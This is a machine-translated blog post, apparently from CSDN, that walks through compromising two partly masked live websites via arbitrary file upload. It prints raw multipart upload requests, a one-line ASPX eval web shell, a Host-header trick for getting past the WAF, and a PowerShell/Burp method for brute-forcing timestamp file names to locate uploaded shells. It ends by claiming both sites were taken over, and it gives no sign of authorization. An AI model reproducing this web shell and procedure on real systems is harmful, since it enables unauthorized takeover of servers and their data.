catalogue
If the article is helpful to you, you are welcome to pay attention, like and collect. One click three links support the following Oh!
If you want to communicate and learn together, you can add zkaq222 (note CSDN, but you can't pass it) to learn and make progress together
Site 1: file upload
Source code leaks found
Open your long cherished spicy chicken dictionary, scan and find that the bin.zip information is leaked, and try to conduct code audit
File location: SimpleDataPlatform.SimpleDataPlatform.fileUpload
Find ProccessRequest to receive the request. You can see that after obtaining a bunch of parameters (initialization), the HandleFiles method is entered
Follow up HandleFiles for processing. If dateType=ZBJHSB, continue processing the request. dateType is GET parameter transfer
The path is / Uploads/SetData/ZBJHSB, the str name is timestamp, and STR2 (suffix) is not restricted
OK, this should be a proper upload of any file. As long as there is a return value, the station will be gone. Unfortunately, it doesn't return a value.
Due to the method fileUpload, the file name is
fileUpload.aspx fileUpload.ashx fileUpload.asmx fileUploads.aspx fileUploads.asmx fileUploads.ashx Upload.....etc.
In addition, his existing dictionary exploded and successfully found the file name of 200 returned http://xxx.com:6039/FileUploads.ashx
Directly construct the upload Form. The name field in the Form should not be specifically set (not found in the code). After contracting, it returns 200. May it really be passed on?
POST /FileUploads.ashx?DataType=ZBJHSB HTTP/1.1 Host: xxx.cn:6039 Content-Length: 195 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySVkAJfiOUeRxhsu8 Accept: */* Connection: close ------WebKitFormBoundarySVkAJfiOUeRxhsu8 Content-Disposition: form-data; name="File"; filename="1.aspx" Content-Type: image/jpeg 11111111111 ------WebKitFormBoundarySVkAJfiOUeRxhsu8--
Previously, we saw that the format used is yyyymmddhhmmsfff as the file name, and then directly intercept the suffix as ext. moreover, we have a specific path, so we only need to explode the timestamp file name to win the site. We haven't done this before. We might as well try it.
Burst timestamp
Use Powershell to generate a timestamp, and then press go at Burp to send the request package
powershell -c Get-Date -Format yyyyMMddHHmmssfff
Then blast the last 5 digits, that is, ssfff (because the time on the computer may not be accurate, sometimes even 6 digits may be blasted)
I don't know how long I've been waiting
Good luck. I won't say much later.
Site 2: file upload
Find upload interface
Open website http://xxxx:880/zwwpt/#/ A webpack was found debug mode is not closed. Check JS and find the upload interface
http://xxxxxx:880/zwwpt/data/menuData.json
A hidden html page is found, which cannot be found in the front function node
http://xxxxxx:880/jtwxt/xgjt/security_risk.html
Click the attachment to upload the packet capture
It is found that there is a waf. When the waf is intercepted, 404 will be returned. This is probably the case with the data packet (some other useless parameters are omitted)
POST /jtwpt/Ashxs/BaseInfoTransfer.ashx HTTP/1.1 Host: xxxxx.cn:880 Cookie: Hm_lvt_a8b89d1c622d63c547c83ec412cc50ef=1631849663; Hm_lvt_69968305fa176c802589452987ebddc8=1631858810 Connection: close ------WebKitFormBoundary7PCqG5iQ5vwLZ6AB Content-Disposition: form-data; name="uploadfile[]"; filename="1.aspx" Content-Type: image/jpeg <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%> ------WebKitFormBoundary7PCqG5iQ5vwLZ6AB--
bypass
Modify HOST:
xxxx.cn:880 is xxxx.cn or xxx.cn:8888 (ports other than 880 should be OK)
POST /jtwpt/Ashxs/BaseInfoTransfer.ashx HTTP/1.1 Host: xxxxx.cn Cookie: Hm_lvt_a8b89d1c622d63c547c83ec412cc50ef=1631849663; Hm_lvt_69968305fa176c802589452987ebddc8=1631858810 Connection: close ------WebKitFormBoundary7PCqG5iQ5vwLZ6AB Content-Disposition: form-data; name="uploadfile[]"; filename="1.aspx Content-Type: image/jpeg 1111 ------WebKitFormBoundary7PCqG5iQ5vwLZ6AB--
Successfully bypassed waf and uploaded successfully, but there is no return path
10
Find path
However, the / uploads / directory and / image / directory were found earlier
1
And found that the html is called security_risk.html, construct paths securityrisk and security_risk, security, etc., and then ran the directory
Finally found to exist http://xxx.cn:880/uploads/securityrisk/ This directory
Guess that the file that may be uploaded is probably in this directory, otherwise there is no need to have such a name, and it is also called upload, so try to directly access the file name 1.txt, and the return is 404
http://xxx.cn:880/uploads/securityrisk/1.txt
14
Burst timestamp
According to my humble experience, dot.net websites like to use time stamps for naming, so construct the current time stamp and try to explode the time stamp value at the time point near the upload time.
The timestamp is generally 10 bits or 13 bits
The naming rules of forced conversion file names after file upload are generally
1. Random string
We can't guess this type in xxx-xxx-xxx--xxx.jpg format. If there is no directory traversal or return path, we can basically give up
2. Timestamp type
Directly timestamp+.jpg Is the file name (e.g. 16318676.jpg) time stamp+00001 time stamp+0001 time stamp+001 time stamp+01 time stamp
3. yymmddHHmm type
This type is generally in the format of 20210917xxxxx. xxxx should be a number at the millisecond level. We can directly use Burp for explosive running. 4-6 bits can still run, and no more can run.
powershell -c Get-Date -Format yyyyMMddHHmm
yyyyMMddHHmmssfff yyyyMMddHHmmssfff+00001 yyyyMMddHHmmssfff+0001 yyyyMMddHHmmssfff+001 yyyyMMddHHmmssfff+01 yyyyMMddHHmmssfff yyyyMMddHHmmss yyyyMMddHHmmss+00001 yyyyMMddHHmmss+0001 yyyyMMddHHmmss+001 yyyyMMddHHmmss+01 yyyyMMddHHmmss
After sorting out the ideas, let's start blasting. We just need to remember the current time when Burp contracts, obtain the current timestamp, and then use Burp intruder blasting to run. Sorting the past one by one requires about 15 repetitions. Each time I choose the last 5 digits for blasting (there should be no problem with each type as long as the website is not linked and omitted)
After a large amount of blasting, the uploaded text file was found, with the format and content of
yyyyMMddHHmmss+0001
After successfully finding the path, there is no need to talk about the following
However, this method still depends on luck, because it is likely that the time of the current server is inconsistent with that of the target website, such as a few hours or even a few days. If yes yyyyMMddHHmmssfff In this case, there's basically no way. I think I'm unlucky If it is yyyyMMddHHmmss In this case, it is possible to explode the 6-digit number.
So far, both stations have got permission